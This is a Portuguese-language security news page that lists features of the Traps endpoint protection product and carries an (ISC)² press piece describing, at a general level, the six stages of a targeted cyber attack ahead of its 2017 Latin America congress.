  • Suporte para Mac OS e Android (beta): O Traps agora atende sistemas macOS, substituindo antivírus legado por uma abordagem de múltiplos métodos de prevenção. A proteção para dispositivos Androids também está disponível por meio de um programa beta de acesso comunitário.
  • Proteção contra macros maliciosos: Prevenir ataques baseados em macros frequentemente usados por ransomware e outros ataques avançados, bloqueando preventivamente macros maliciosos conhecidos e desconhecidos que são incorporados em documentos Office.
  • Prevenção de ataques baseados em script: Prevenir processos vulneráveis como navegadores e aplicações Office de lançar ferramentas sensíveis como PowerShell e mecanismos de scripts.
  • Kit de proteção de impressão digital para exploit: Interromper tentativas de ataques para identificar e demarcar endpoints vulneráveis, através do bloqueio de suas ferramentas de perfil.
  • Proteção de escalação de privilégio no kernel: Bloquear ataques avançados visando o próprio sistema operacional.

(ISC)² alerta para ataque cibernético direcionado (TCA)

O (ISC)², principal instituto do mundo focado em educação e certificações para profissionais em Segurança da Informação e Cibersegurança, alerta para os cuidados com Ataques Cibernéticos Direcionados (Targeted Cyber Attack – TCA), que têm como objetivo roubar informações ou dinheiro de pessoas e organizações por um longo período de tempo. A ameaça direciona seus esforços apenas para uma vítima, procurando manter-se anônimo enquanto captura os dados desejados.

Durante o Security Congress Latin America 2017, especialistas em Segurança da Informação de toda a América Latina vão abordar os principais temas e tendências da área. Falarão, por exemplo, sobre temas como o TCA, que é caracterizado principalmente por ser anônimo e contínuo em longo prazo. “Normalmente, um ataque direcionado bem-sucedido só é descoberto meses ou anos depois do seu início. Durante esse tempo, milhões de registros são obtidos ou valores desviados sem serem notados. Identificar um TCA demanda conhecimento, planejamento, prevenção e monitoramento”, explica Kleber Melo, presidente do Conselho Consultivo do (ISC)² para América Latina

O ataque é executado em seis etapas. O primeiro passo é a realização de um estudo minucioso da vítima para adquirir as informações que serão usadas no ataque. Essa fase utiliza técnicas de engenharia social, levantando dados da empresa, colaboradores e arquitetura técnica de sistema e equipamentos, incluindo versões, patches aplicados e configurações.

Com os dados coletados, o atacante inicia a segunda etapa, em que define uma estratégia de ação e escolhe o melhor momento para a ofensiva, aplicando vários métodos para se infiltrar na rede sem ser notado. O despreparo dos funcionários é explorado para infectar ou abrir as portas necessárias.

Na terceira etapa, conhecida como Command and Control, o invasor inicia a comunicação remota depois de injetar seu código de robô malicioso na rede. Comandos executados por esse código são enviados aos sistemas de monitoramento para que ele expanda seu perímetro de acesso e obtenha o completo mapeamento e controle da rede atacada.

A quarta fase é a de movimentação lateral. O atacante expande a infecção, controla outros sistemas e obtém mais informações do ambiente, selecionando uma base de dados importante para o sucesso do ataque. Já na quinta etapa, chamada de Asset/Data Discovery, é realizada a identificação e seleção das informações relevantes. Nessa fase, é possível exportar pequenas amostras para análise e qualificação.

Por fim, acontece a exportação de dados, com a obtenção das informações ou transferência de valores. Se o invasor conseguir estabelecer um meio furtivo de comunicação que não seja identificado, essa etapa poderá durar meses ou anos, e é assim que começa o roubo propriamente dito. Ele exporta as informações desejadas e movimenta valores e dados em quantidade e velocidade suficientes para não ser notado.

Embora o combate seja complexo, é preciso estudar e estruturar planos que mitiguem as ameaças institucionais. “Conscientizar o conselho executivo dessa necessidade e definir as ações para a redução ou aceitação desse risco também são essenciais para uma boa gestão de Segurança da Informação alinhada aos objetivos de negócios. Ignorar o risco de ser alvo de um TCA é desconsiderar o real valor do conhecimento e dos segredos industriais que sustentam o crescimento e o diferencial competitivo das empresas”, afirma Melo.

“O compartilhamento de experiências e conhecimento entre os profissionais da área são a principal arma contra ataques como esse e outros riscos que organizações e usuários sofrem diariamente no ambiente digital. Esse é o principal objetivo do (ISC)² Security Congress Latin America: apoiar o desenvolvimento dos profissionais de Segurança da Informação de forma dinâmica e sempre atual”, completa Gina van Dijk, diretora regional do (ISC)² América Latina.